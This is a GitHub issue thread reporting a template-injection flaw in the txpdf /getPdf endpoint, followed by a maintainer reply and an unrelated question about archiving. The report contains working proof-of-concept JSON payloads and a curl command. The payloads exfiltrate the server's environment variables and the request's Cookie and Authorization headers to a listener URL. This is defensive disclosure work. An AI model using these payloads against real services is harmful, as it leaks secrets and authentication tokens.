Data exfil due to user controlled template

[jessesomerville]

The /getPdf endpoint takes the body of the post request and uses it as a text/template with the functions provided by sprig.TxtFuncMap(). This allows for the exfil of the server's environment variables and potentially auth tokens included in the request by middleware.

input.json:

{
  "options": {
    "print_media_type": true
  },
  "pages": [
    {
      "Location": "http://localhost:8000?{{env .UserAgent}}"
    }
  ]
}

curl -d '@input.json' -X POST http://localhost:8080/getPdf -A "PWD" --output test.pdf

Log from python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [04/Mar/2023 17:15:05] "GET /?/home/jsomerville/go/src/github.com/txn2/txpdf HTTP/1.1" 200 -

Or if this is running as a microservice you could steal the request headers that may have been added for S2S auth:

{
  "options": {
    "print_media_type": true
  },
  "pages": [
    {
      "Location": "http://localhost:8000?{{.Header.Get `Cookie`}};;{{.Header.Get `Authorization`}}"
    }
  ]
}

[cjimti]

added security section to README

[developer992]

has this project been discontinued or why is the repo archived ? not this one but wkhtmltopdf has been archived ...